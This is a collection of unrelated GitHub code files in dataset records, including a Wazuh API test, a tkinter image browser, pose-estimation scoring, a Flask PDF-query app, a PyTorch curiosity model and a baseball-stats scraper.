method.lower())(f\"{api_details['base_url']}{endpoint_url}\", headers=headers,\n verify=False, json=json_body)\n\n assert response.headers['Content-Type'] == 'application/problem+json; charset=utf-8'\n assert response.status_code == expected_status_code\n assert json.loads(response.text) == expected_response_text # type and status keys deleted\n","repo_name":"wazuh/wazuh-qa","sub_path":"tests/integration/test_api/test_middlewares/test_response_postprocessing.py","file_name":"test_response_postprocessing.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"30662401172","text":"from tkinter import *\r\nfrom functools import partial\r\nimport tkinter as tk\r\nfrom PIL import Image, ImageTk\r\nimport math, os\r\nfrom PixInfo import PixInfo\r\n\r\n\r\nclass test(Frame) :\r\n\r\n # Constructor.\r\n def __init__(self, master, pixInfo):\r\n Frame.__init__(self, master)\r\n self.master = master\r\n self.pixInfo = pixInfo\r\n self.colorCode = pixInfo.get_colorCode()\r\n self.intenCode = pixInfo.get_intenCode()\r\n # Full-sized images.\r\n self.imageList = pixInfo.get_imageList()\r\n # Thumbnail sized images.\r\n self.photoList = pixInfo.get_photoList()\r\n # Image size for formatting.\r\n self.xmax = pixInfo.get_xmax()\r\n self.ymax = pixInfo.get_ymax()\r\n global count\r\n self.count = 0\r\n\r\n # Create Main frame.\r\n mainFrame = Frame(master)\r\n mainFrame.pack()\r\n\r\n # Create Picture chooser frame.\r\n listFrame = Frame(mainFrame, width=300)\r\n listFrame.pack(side=BOTTOM,fill= X,expand=True)\r\n\r\n # Create Control frame.\r\n controlFrame = Frame(mainFrame)\r\n controlFrame.pack(side=RIGHT)\r\n\r\n # Create Preview frame.\r\n previewFrame = Frame(mainFrame,\r\n width=self.xmax + 45, height=self.ymax)\r\n previewFrame.pack_propagate(0)\r\n previewFrame.pack(side=LEFT)\r\n\r\n def nextPage():\r\n print(self.count)\r\n if self.count != 100:\r\n for widgets in listFrame.winfo_children():\r\n widgets.destroy()\r\n\r\n for i in range(4):\r\n for j in range(5):\r\n button = tk.Button(listFrame, text=\"test\", image=self.photoList[int(self.count)], width=100, height=50,\r\n command=partial(buttonClicked, self.count))\r\n # self.button1.pack(side= LEFT)\r\n button.grid(row=i + 1, column=j + 1)\r\n self.count += 1\r\n\r\n def previousPage():\r\n print(\"before\", self.count)\r\n self.count -= 20\r\n\r\n print(\"after\", self.count)\r\n if (self.count > 0):\r\n self.count -= 20\r\n for widgets in listFrame.winfo_children():\r\n widgets.destroy()\r\n\r\n for i in range(4):\r\n for j in range(5):\r\n button = tk.Button(listFrame, text=\"test\", image=self.photoList[int(self.count)], width=100, height=50,\r\n command=partial(buttonClicked, self.count))\r\n # self.button1.pack(side= LEFT)\r\n button.grid(row=i + 1, column=j + 1)\r\n self.count += 1\r\n else:\r\n self.count += 20\r\n\r\n # Layout Controls.\r\n previousBtn = Button(controlFrame, text=\"previous page\",\r\n command=partial(previousPage))\r\n previousBtn.grid(row=1, column=1)\r\n\r\n nextPageBtn = Button(controlFrame, text=\"next page\",\r\n command=partial(nextPage))\r\n nextPageBtn.grid(row=1, column=2)\r\n\r\n\r\n\r\n #########################################\r\n # Layout Picture ListBox in images\r\n\r\n def buttonClicked(idx):\r\n print(idx)\r\n\r\n # for i in range(len(self.imageList)):\r\n\r\n for i in range(4):\r\n for j in range(5):\r\n button = tk.Button(listFrame, text=\"test\", image=self.photoList[int(self.count)], width=100, height=50,\r\n command=partial(buttonClicked,self.count))\r\n # self.button1.pack(side= LEFT)\r\n button.grid(row=i+1, column=j + 1)\r\n self.count+=1\r\n\r\n\r\n\r\n\r\n\r\n\r\n ##########################################\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n root = Tk()\r\n root.title('Image Analysis Tool')\r\n\r\n # resultWin = Toplevel(root)\r\n # resultWin.title('Result Viewer')\r\n # resultWin.protocol('WM_DELETE_WINDOW', lambda: None)\r\n\r\n pixInfo = PixInfo(root)\r\n\r\n test = test(root, pixInfo)\r\n\r\n\r\n root.mainloop()","repo_name":"yuyol/multimediaProject","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11773100212","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# Author: Donny You(youansheng@gmail.com)\n# Pose Estimation running score.\n\n\nimport numpy as np\n\n\nclass PoseRunningScore(object):\n def __init__(self, configer):\n self.configer = configer\n self.oks_all = np.zeros(0)\n self.oks_num = 0\n\n def compute_oks(self, gt_kpts, pred_kpts):\n \"\"\"Compute oks matrix (size gtN*pN).\"\"\"\n gt_count = len(gt_kpts)\n pred_count = len(pred_kpts)\n oks = np.zeros((gt_count, pred_count))\n if pred_count == 0:\n return oks.T\n\n # for every human keypoint annotation\n for i in range(gt_count):\n anno_keypoints = np.reshape(np.array(gt_kpts[i]), (self.configer.get('data', 'num_keypoints'), 3))\n visible = anno_keypoints[:, 2] == 1\n scale = max(np.max(anno_keypoints[:, 0]) - np.min(anno_keypoints[:, 0]),\n np.max(anno_keypoints[:, 0]) - np.min(anno_keypoints[:, 0])) ** 2 + 1e-8\n\n if np.sum(visible) == 0:\n for j in range(pred_count):\n oks[i, j] = 0\n else:\n # for every predicted human\n for j in range(pred_count):\n predict_keypoints = np.reshape(np.array(pred_kpts[j]),\n (self.configer.get('data', 'num_keypoints'), 3))\n dis = np.sum((anno_keypoints[visible, :2] - predict_keypoints[visible, :2]) ** 2, axis=1)\n oks[i, j] = np.mean(\n np.exp(-dis / 2 / self.configer.get('details', 'delta')[visible] ** 2 / (scale + 1))\n )\n\n return oks\n\n def update(self, batch_pred_kpts, batch_gt_kpts):\n \"\"\"Evaluate predicted_file and return mAP.\"\"\"\n # Construct set to speed up id searching.\n # for every annotation in our test/validation set\n for i in range(len(batch_pred_kpts)):\n # if the image in the predictions, then compute oks\n oks = self.compute_oks(batch_gt_kpts[i], batch_pred_kpts[i])\n # view pairs with max OKSs as match ones, add to oks_all\n self.oks_all = np.concatenate((self.oks_all, np.max(oks, axis=1)), axis=0)\n # accumulate total num by max(gtN,pN)\n self.oks_num += np.max(oks.shape)\n\n def get_mAP(self):\n # compute mAP by APs under different oks thresholds\n average_precision = []\n for threshold in np.linspace(0.5, 0.95, 10):\n average_precision.append(np.sum(self.oks_all > threshold) / np.float32(self.oks_num))\n\n return np.mean(average_precision)\n\n def reset(self):\n self.oks_all = np.zeros(0)\n self.oks_num = 0\n\n","repo_name":"donnyyou/torchcv","sub_path":"metric/pose/pose_running_score.py","file_name":"pose_running_score.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":2235,"dataset":"github-code","pt":"21"} +{"seq_id":"18041077112","text":"import tensorflow as tf\nimport tensorflow_hub as hub\nfrom tensorflow_text import SentencepieceTokenizer\nimport globals\n\nclass Embedder:\n def _download_embedding_model(self):\n # universal sentence encoder model\n moduleUrl = 'https://tfhub.dev/google/universal-sentence-encoder-multilingual/3'\n print(\"Loading module url\")\n self.embeddingModel = hub.load(moduleUrl)\n print(\"Module url loaded\")\n\n def __init__(self):\n self._download_embedding_model()\n \n def getSentenceEmbedding(self, sentence: str) -> list[float]:\n self.embeddingCounter = self.embeddingCounter + 1\n globals.guiHandler.printProgress(self.embeddingCounter, self.numOfSentences)\n return self.embeddingModel(sentence)\n \n def getSentenceListEmbedding(self, sentenceList: list[str]) -> list[list[float]]:\n self.embeddingCounter = 0\n self.numOfSentences = len(sentenceList)\n return list(map(self.getSentenceEmbedding, sentenceList))\n \n def getEmbedDistance(self, embeddingA: list[float], embeddingB: list[float]) -> float:\n distance = tf.sqrt(tf.reduce_sum(tf.square(embeddingA - embeddingB)))\n return distance.numpy()\n \nsupportedLanguages = [\"ar\", \"zh-CN\", \"zh-TW\", \"en\", \"fr\", \"de\",\n \"it\", \"ja\", \"ko\", \"nl\", \"pl\", \"pt\", \"es\",\n \"th\", \"tr\", \"ru\"]\n \n ","repo_name":"Classic-Daniel/BilingualBookGenerator","sub_path":"embedding/embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21708130921","text":"# Copyright 2020 June Hanabi\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n# This installs, updates, and removes package files in the projects folder to match the assets folder\r\nimport fnmatch\r\n\r\nimport os\r\nimport shutil\r\nfrom settings import assets_path, mods_folder, creator_name, project_name, build_path\r\nfrom Utility.helpers_path import ensure_path_created, remove_file\r\n\r\nmod_name_folder_path = mods_folder + os.sep + creator_name + \"_\" + project_name\r\n\r\nensure_path_created(mod_name_folder_path)\r\nfile_list_failed = []\r\n\r\n\r\ndef remove_tl_packages(path: str) -> int:\r\n count = 0\r\n\r\n # Remove existing package files\r\n for root, dirs, files in os.walk(path):\r\n for filename in fnmatch.filter(files, \"*.package\"):\r\n remove_file(root + os.sep + filename)\r\n count+=1\r\n\r\n # Only cover the top-level folder\r\n break\r\n return count\r\n\r\n\r\ndef copy_tl_packages(src: str, dest: str) -> int:\r\n count = 0\r\n\r\n # Copy new package files\r\n for root, dirs, files in os.walk(src):\r\n for filename in fnmatch.filter(files, \"*.package\"):\r\n try:\r\n shutil.copy(root + os.sep + filename,\r\n dest + os.sep + filename)\r\n count += 1\r\n except:\r\n file_list_failed.append(root + os.sep + filename)\r\n\r\n # Only cover the top-level folder\r\n break\r\n\r\n return count\r\n\r\n\r\nfiles_removed = remove_tl_packages(mod_name_folder_path)\r\nremove_tl_packages(build_path)\r\n\r\nfiles_added = copy_tl_packages(assets_path, mod_name_folder_path)\r\ncopy_tl_packages(assets_path, build_path)\r\n\r\nfile_difference = files_added - files_removed\r\n\r\nprint(\"Synced packages:\" +\r\n \" +\" + str(files_added) +\r\n \" -\" + str(files_removed) +\r\n \" ~\" + str(file_difference))\r\n\r\nif len(file_list_failed) > 0:\r\n print(\"\")\r\n print(\"Failed to copy these files, make sure the packages are named uniquely\")\r\n print(\"\")\r\n print(\"\\n\".join(file_list_failed))\r\n","repo_name":"junebug12851/Sims4ScriptingBPProj","sub_path":"sync_packages.py","file_name":"sync_packages.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"} +{"seq_id":"29907643577","text":"#!/usr/bin/env python3\nimport sys\nimport re\nimport os\nimport statistics\n\ndef parseFile(path,printresult=False):\n result = {}\n with open(path, 'r') as file:\n #remove three lines\n header = file.readline()\n header = file.readline()\n header = file.readline()\n\n\n time = 0\n sum_swapin = 0\n sum_swapout = 0\n while True:\n line = file.readline().strip()\n line = re.split(\"\\ +\", line)\n\n if line[-2] != \"0.00\" or line[-1] != \"0.00\":\n break\n while len(line) != 1 or line[0] != '':\n time += 1\n sum_swapin += float(line[-2])\n sum_swapout += float(line[-1])\n line = file.readline().strip()\n line = re.split(\"\\ +\", line)\n filename = path.split('_')\n\n result[\"bench\"] = filename[0]\n result[\"system\"] = filename[2]\n result[\"size\"] = filename[1]\n result[\"run\"] = filename[3]\n result[\"runtime\"] = time\n result[\"swapin\"] = sum_swapin\n result[\"swapout\"] = sum_swapout\n if printresult:\n print(\"{},{},{},{},{},{:.2f},{:.2f}\".format(filename[0],filename[2],filename[1],filename[3], time, sum_swapin/1000, sum_swapout/1000))\n return result\n \ndef printCurr(c):\n if \"bench\" in c:\n if len(c[\"swapin\"]) == 1:\n print(\"{},{},{},{:.2f},0,{:.2f},0\".format(c[\"bench\"], c[\"system\"], c[\"size\"], \n statistics.mean(c[\"swapin\"])/1000,\n statistics.mean(c[\"swapout\"])/1000))\n else:\n print(\"{},{},{},{:.2f},{:.2f},{:.2f},{:.2f}\".format(c[\"bench\"], c[\"system\"], c[\"size\"], \n statistics.mean(c[\"swapin\"])/1000, statistics.stdev(c[\"swapin\"])/1000,\n statistics.mean(c[\"swapout\"])/1000, statistics.stdev(c[\"swapout\"])/1000))\n\nif len(sys.argv) == 2:\n parseFile(sys.argv[1], True)\n exit()\nelif len(sys.argv) != 1:\n print(\"Wrong input\")\n exit()\n\n\ncurr = {}\nfor x in sorted(os.listdir()):\n if x.endswith(\"swap.txt\"):\n ret = parseFile(x)\n if \"bench\" not in curr or curr[\"bench\"] != ret[\"bench\"] or curr[\"system\"] != ret[\"system\"] or curr[\"size\"] != ret[\"size\"]:\n printCurr(curr)\n curr[\"bench\"] = ret[\"bench\"]\n curr[\"system\"] = ret[\"system\"]\n curr[\"size\"] = ret[\"size\"]\n curr[\"swapin\"] = []\n curr[\"swapout\"] = []\n curr[\"swapin\"].append(ret[\"swapin\"])\n curr[\"swapout\"].append(ret[\"swapout\"])\nprintCurr(curr)\n","repo_name":"oscarlab/mosaic-asplos23-artifacts","sub_path":"2-linux-mosaic/vmfiles/scripts/parse_results.py","file_name":"parse_results.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"28916007533","text":"import os\nfrom flask import Blueprint\nfrom flask import flash, request, redirect, url_for, render_template, send_from_directory\nfrom werkzeug.utils import secure_filename\nfrom src.logic.process_query_LLM import *\nfrom src.model.JsonTools import write_json, read_json\n\n#Global variables\nUPLOAD_FOLDER = 'store'\nALLOWED_EXTENSIONS = {'pdf'}\nTAGS_PROMPS_DB = 'promps.json'\nquery_answer_tuple_list = []\ndb=None\n\nmain_bp = Blueprint('main', __name__)\n\n@main_bp.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n joinPath = build_file_path(filename)\n create_directory_if_it_doesnot_exist(joinPath)\n file.save(joinPath)\n return redirect(url_for('main.dir_listing'))\n return render_template('load_form_super.html')\n\n@main_bp.route('/about')\ndef about_page():\n return render_template('about.html')\n\n\n#File\n\n@main_bp.route('/files', methods=['GET'])\ndef dir_listing():\n abs_path = os.path.join(UPLOAD_FOLDER, '')\n extension_file = \".pdf\"\n pdf_files = get_files_in_subdir(abs_path, extension_file)\n return render_template('files.html', files = pdf_files)\n\n@main_bp.route('/files/')\ndef download_file(name):\n joinPath = build_file_path(name)\n path = os.path.join( '../', os.path.dirname(joinPath))\n return send_from_directory(path, name)\n\n@main_bp.route('/process/', methods=['GET', 'POST'])\ndef process_file(name):\n joinPath = build_file_path(name)\n process_query_LLM(joinPath)\n return redirect(url_for('main.upload_file'))\n\n@main_bp.route('/consult/', methods=['GET', 'POST'])\ndef consult_file(name):\n global db, query_answer_tuple_list\n db = build_the_database(name)\n query_answer_tuple_list = []\n return redirect(url_for('main.make_query_form'))\n\ndef build_the_database(name):\n joinPath = build_file_path(name)\n return consult_query_LLM(joinPath)\n\n@main_bp.route('/delete/', methods=['GET', 'POST'])\ndef delete_file(name):\n joinPath = build_file_path(name)\n remove_file_path(joinPath)\n return redirect(url_for('main.dir_listing'))\n\n#Query process\n\n@main_bp.route('/query_form')\ndef make_query_form():\n global db\n if not db:\n return\n return render_template('query.html')\n\n@main_bp.route('/query/', methods=['GET', 'POST'])\ndef query():\n global db\n if not db:\n return\n if request.method == 'POST':\n query = request.form['query']\n answer = send_query_to_OpenAI(db, query)\n else:\n answer = 'no answer!!!'\n return process_answer(query, answer)\n\n@main_bp.route(\"/redirect\", methods=[\"POST\"])\ndef redirect_to_new_page():\n return redirect(url_for(\"main.make_query_form\"))\n\n@main_bp.route(\"/multiple-docs-query\", methods=['POST'])\ndef handle_data():\n global db\n my_json = request.get_json()\n files = my_json['files']\n # do something with the data...\n for file in files:\n temp_db = build_the_database(file)\n if not db:\n db = temp_db\n else:\n db.merge_from(temp_db)\n return \"Done!\"\n\n#Promps process\n@main_bp.route('/newpromps/', methods=['POST'])\ndef new_promps_form(promps):\n return render_template('new_promps.html', promps = promps)\n\n@main_bp.route('/save-promps', methods=['GET', 'POST'])\ndef save_promps():\n if request.method == 'POST':\n tags = request.form['tags']\n promps = request.form['promps']\n save_tags_and_promps_in_json(tags, promps)\n global query_answer_tuple_list\n return render_template('answer.html', query_answer_tuple_list = query_answer_tuple_list)\n\n\n#Promps list page\n\n@main_bp.route('/promps')\ndef promps_list():\n tags_promps_db = os.path.join(UPLOAD_FOLDER, TAGS_PROMPS_DB)\n data_list = read_json(tags_promps_db)\n tuple_list = [(d['tags'], d['promps']) for d in data_list]\n return render_template('promps_list.html', promps = tuple_list)\n\n@main_bp.route('/promps/', methods=['GET', 'POST'])\ndef promps_query(query):\n global db\n if not db:\n return\n answer = send_query_to_OpenAI(db, query)\n return process_answer(query, answer)\n\n#Commond\n\ndef process_answer(query, answer):\n global query_answer_tuple_list\n query_answer_tuple_list.append((query, answer))\n return render_template('answer.html', query_answer_tuple_list = query_answer_tuple_list)\n\n#Tools\ndef build_file_path(filename):\n return os.path.join(UPLOAD_FOLDER, cleanFilename(filename), filename)\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n#Controlers\n\nimport shutil\ndef remove_file_path(path_file_name):\n if os.path.exists(path_file_name):\n shutil.rmtree(os.path.dirname(path_file_name))\n\ndef save_tags_and_promps_in_json(tags, promps):\n tags_promps_db = os.path.join(UPLOAD_FOLDER, TAGS_PROMPS_DB)\n data = read_json(tags_promps_db)\n new_item = {\"tags\": tags, \"promps\": promps}\n data.append(new_item)\n write_json(tags_promps_db, data)","repo_name":"yosbel-penate/SemanticSearchLangChaing","sub_path":"app/router/main_routes.py","file_name":"main_routes.py","file_ext":"py","file_size_in_byte":5402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28611222374","text":"from model import *\nfrom model.weighting import *\n\nterm_doc_dict = {\"1\":{\"Hello\":1, \"World\":0, \"Python\":1},\n \"2\":{\"Hello\":1, \"World\":1, \"Python\":1},\n \"3\":{\"Hello\":2, \"World\":0, \"Python\":3}}\n\nterm_q_dict = {\"Hello\":1, \"World\":0, \"Python\":1}\n\nweight_doc = Weighting_Doc()\nweight_q = Weighting_Query()\n\nprint(weight_doc.tf_idf(term_doc_dict))\nprint(weight_q.tf_idf(term_q_dict, term_doc_dict))\n","repo_name":"chnpat/ir-backend","sub_path":"unitTest.py","file_name":"unitTest.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75187660213","text":"# Derived from https://github.com/chagmgang/pytorch_ppo_rl/blob/master/model.py\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torch\nimport torch.optim as optim\nimport numpy as np\nimport math\nfrom torch.nn import init\nfrom gymnasium.spaces import Box, Discrete\n\nclass ICMModel(nn.Module):\n def __init__(self, input_size, feature_size, hidden_size, output_size, action_space=None):\n super(ICMModel, self).__init__()\n\n if type(input_size) == int or len(input_size) == 1:\n self.image=False\n self.input_size = input_size if type(input_size) == int else input_size[0]\n else:\n self.image=True\n self.input_size = input_size\n self.feature_size = feature_size\n self.hidden_size = hidden_size\n self.output_size = output_size \n self.action_space = action_space\n\n if self.image:\n self.feature = nn.Sequential(\n nn.Conv2d(\n in_channels=input_size[2],\n out_channels=32,\n kernel_size=8,\n stride=4),\n nn.LeakyReLU(),\n nn.BatchNorm2d(num_features=32),\n nn.Conv2d(\n in_channels=32,\n out_channels=64,\n kernel_size=4,\n stride=2),\n nn.LeakyReLU(),\n nn.BatchNorm2d(num_features=64),\n nn.Conv2d(\n in_channels=64,\n out_channels=64,\n kernel_size=3,\n stride=1),\n nn.LeakyReLU(),\n nn.BatchNorm2d(num_features=64),\n nn.Flatten(start_dim=1),\n nn.Linear(\n 7 * 7 * 64,\n self.feature_size),\n nn.LeakyReLU(),\n nn.BatchNorm1d(num_features=self.feature_size),\n )\n else:\n self.feature = nn.Sequential(\n nn.Linear(self.input_size, self.hidden_size),\n nn.LeakyReLU(),\n nn.BatchNorm1d(num_features=self.hidden_size),\n nn.Linear(self.hidden_size, self.hidden_size),\n nn.LeakyReLU(),\n nn.BatchNorm1d(num_features=self.hidden_size),\n nn.Linear(self.hidden_size, self.feature_size),\n nn.BatchNorm1d(num_features=self.feature_size),\n # large scale study didn't use an activation here \n )\n\n self.inverse_model = nn.Sequential(\n nn.Linear(self.feature_size * 2, self.hidden_size),\n nn.ReLU(),\n nn.Linear(self.hidden_size, hidden_size),\n nn.ReLU(),\n nn.Linear(self.hidden_size, output_size),\n # large scale study didn't use an activation on features, inverse, or forward \n # https://github.com/openai/large-scale-curiosity/blob/master/auxiliary_tasks.py\n )\n\n self.forward_model = nn.Sequential(\n nn.Linear(output_size + self.feature_size, self.hidden_size),\n nn.LeakyReLU(),\n nn.Linear(self.hidden_size, self.hidden_size),\n nn.LeakyReLU(),\n nn.Linear(self.hidden_size, self.feature_size),\n # nn.Tanh(),\n\n )\n\n for p in self.modules():\n if isinstance(p, nn.Conv2d):\n init.kaiming_uniform_(p.weight)\n p.bias.data.zero_()\n\n if isinstance(p, nn.Linear):\n init.kaiming_uniform_(p.weight, a=1.0)\n p.bias.data.zero_()\n\n def forward(self, inputs, train=True):\n state, next_state, action = inputs\n if self.image:\n state = torch.permute(state, (0, 3, 1, 2)).float()\n next_state = torch.permute(next_state, (0, 3, 1, 2)).float()\n if isinstance(self.action_space, Discrete): \n if len(action.shape)>1:\n action = action.squeeze()\n action = torch.nn.functional.one_hot(action, self.action_space.n).float()\n encode_state = self.feature(state)\n encode_next_state = self.feature(next_state)\n if train:\n pred_action = torch.cat((encode_state, encode_next_state), 1) \n pred_action = self.inverse_model(pred_action)\n else:\n pred_action = None\n\n # ---------------------\n \n # get pred next state\n pred_next_state_feature = torch.cat((encode_state, action), 1)\n pred_next_state_feature = self.forward_model(pred_next_state_feature)\n\n real_next_state_feature = encode_next_state\n return real_next_state_feature, pred_next_state_feature, pred_action","repo_name":"act3-ace/Curious-POET","sub_path":"cpoet/central_icm/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31745559264","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Date : 2017-04-18 17:02:55\r\n# @Author : hbyandy (hbyandy@yeah.net)\r\n# @Link : \r\n# @Version : $Id$\r\n\r\nfrom os import path\r\nimport logging\r\nimport logging.config\r\nimport asyncio,os,json,time\r\nfrom datetime import datetime\r\nfrom aiohttp import web\r\n\r\nlog_file_path = path.join(path.dirname(path.abspath(__file__)),'conf', 'logging.config')\r\nlogging.config.fileConfig(log_file_path)\r\napp_logger = logging.getLogger(\"TEST_LOGGER\")\r\n\r\ndef index(request):\r\n\treturn web.Response(body = '

Awesome

')\r\n\r\nasync def init(loop):\r\n\tapp = web.Application(loop = loop)\r\n\tapp.router.add_route('GET','/',index)\r\n\tserver = await loop.create_server(app.make_handler(),'127.0.0.1',9000)\r\n\tlogging.info('server started at http://127.0.0.1:9000...')\r\n\treturn server\r\n\r\nloop = asyncio.get_event_loop()\r\nloop.run_until_complete(init(loop))\r\nloop.run_forever()","repo_name":"hbyandy/python_learn","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19593693999","text":"def main():\n for i in range(1,11):\n file = 'logs/property' + str(i) + '_summary.txt'\n lines = open(file, 'r')\n\n print('########################\\n')\n print('Prop {}'.format(i))\n\n verified = 0\n falsified = 0\n timeout = 0\n time = 0\n\n for line in lines:\n data = line.split(', ')\n time = time + int(data[2])\n\n if data[1] == 'SAT':\n falsified = falsified + 1\n elif data[1] == 'UNSAT':\n verified = verified + 1\n elif data[1] == 'TIMEOUT':\n timeout = timeout + 1\n else:\n raise Error()\n\n time = round(time / 1000)\n min = int(time / 60)\n sec = time - 60 * min\n\n print('Verified = {}'.format(verified))\n print('Falsified = {}'.format(falsified))\n print('Timeout = {}'.format(timeout))\n print('Time = {}m{}s'.format(min, sec))\n\n print('\\n########################')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"longph1989/Socrates","sub_path":"exp-results/reluplex/parse_results.py","file_name":"parse_results.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"21"} +{"seq_id":"7364537227","text":"from mysqlconnection import connectToMySQL\n\nclass Users:\n def __init__(self,data):\n self.id = data[\"id\"]\n self.first_name = data[\"first_name\"]\n self.last_name = data[\"last_name\"]\n self.email = data[\"email\"]\n self.created_at = data[\"created_at\"]\n self.updated_at = data[\"updated_at\"]\n\n\n @classmethod\n def insert_new(cls,data):\n query = \"INSERT INTO users (first_name, last_name, email) VALUES (%(first_name)s, %(last_name)s, %(email)s)\"\n return connectToMySQL(\"users_schema\").query_db(query,data)\n\n @classmethod\n def read_all(cls):\n query = \"SELECT * FROM users ORDER BY id DESC\"\n db_users = connectToMySQL(\"users_schema\").query_db(query)\n users = []\n\n for u in db_users:\n users.append(Users(u))\n \n return users","repo_name":"Inxie/Python","sub_path":"Flask_MySQL/crud/users_cr/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27499977912","text":"# def l100kmtompg(litros):\n# galones = litros / 3.785411784\n# millas = 100 * 1000 / 1609.344\n# return millas / galones\n \n# def mpgtol100km(millas):\n# km100 = millas * 1609.344 / 1000 / 100\n# litros = 3.785411784\n# return litros / km100\n\n\n# print(l100kmtompg(3.9))\n# print(l100kmtompg(7.5))\n# print(l100kmtompg(10.))\n# print(mpgtol100km(60.3))\n# print(mpgtol100km(31.4))\n# print(mpgtol100km(23.5))\n\ngrupo = {}\n\nwhile True:\n nombre = input(\"Ingresa el nombre del estudiante (o exit para detenerse): \")\n if nombre == 'exit':\n break\n \n calif = int(input(\"Ingresa la calificación del alumno (0-10): \"))\n \n if nombre in grupo:\n grupo[nombre] += (calif,) # {'Erik': (10, 7, 4)}\n else:\n grupo[nombre] = (calif,)\n\nprint(grupo)","repo_name":"xErik444x/apuntesPython","sub_path":"codes/Parte1/millasakilometrosycosas.py","file_name":"millasakilometrosycosas.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"964112536","text":"from bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\n\n\n# Adjust the scraping so that it only gets regular season games\ndef get_schedule(year):\n schedule = []\n\n url = 'https://www.baseball-reference.com/leagues/MLB/' + str(year) + '-schedule.shtml'\n schedule_page = requests.get(url)\n\n soup = BeautifulSoup(schedule_page.text, 'html.parser')\n games = soup.find_all(class_='game')\n\n for game in games:\n if game.find('span') != None:\n continue\n teams = game.find_all('a')\n away_team = teams[0].text\n home_team = teams[1].text\n\n schedule.append((away_team, home_team))\n\n return (year, schedule)\n\n\n# will take some doing...\n# need the correct values for attributes of a Player class\n# and need to aggregate them to the correct team in a list\n# sort by top 9 batters\n\ndef get_player_batting_df(year):\n\n abbreviations = {\n 'ARI': \"Arizona D'Backs\",\n 'ATL': 'Atlanta Braves',\n 'BAL': 'Baltimore Orioles',\n 'BOS': 'Boston Red Sox',\n 'CHC': 'Chicago Cubs',\n 'CHW': 'Chicago White Sox',\n 'CIN': 'Cincinnati Reds',\n 'CLE': 'Cleveland Indians',\n 'COL': 'Colorado Rockies',\n 'DET': 'Detroit Tigers',\n 'HOU': 'Houston Astros',\n 'KCR': 'Kansas City Royals',\n 'LAA': 'Los Angeles Angels',\n 'LAD': 'Los Angeles Dodgers',\n 'MIA': 'Miami Marlins',\n 'MIL': 'Milwaukee Brewers',\n 'MIN': 'Minnesota Twins',\n 'NYM': 'New York Mets',\n 'NYY': 'New York Yankees',\n 'OAK': 'Oakland Athletics',\n 'PHI': 'Philadelphia Phillies',\n 'PIT': 'Pittsburgh Pirates',\n 'SDP': 'San Diego Padres',\n 'SEA': 'Seattle Mariners',\n 'SFG': 'San Francisco Giants',\n 'STL': 'St. Louis Cardinals',\n 'TBR': 'Tampa Bay Rays',\n 'TEX': 'Texas Rangers',\n 'TOR': 'Toronto Blue Jays',\n 'WSN': 'Washington Nationals'\n }\n\n # Get the player data from web scraper\n # df = pd.DataFrame()\n #\n # url = 'https://www.baseball-reference.com/leagues/MLB/' + str(year) + '-standard-batting.shtml'\n # batting_page = requests.get(url)\n #\n # session = HTMLSession()\n # r = session.get(url)\n # r.html.render(retries=1)\n #\n # soup = BeautifulSoup(r.html.text, 'html.parser')\n #\n # print(soup)\n\n\n\n\n df = pd.read_csv('C:/Users/Wideet/Desktop/MLB_Data/' + str(year) + '_batting.csv')\n # Let's assume we got everything....\n\n # Preprocess to more easily aggregate to team rosters\n df['Team Name'] = df['Tm'].apply(lambda x: abbreviations[x] if x in abbreviations else None)\n df['Name'] = df['Name'].apply(lambda x: x.split('\\\\')[0]).replace('*', '').replace('#','')\n\n roster_indices = 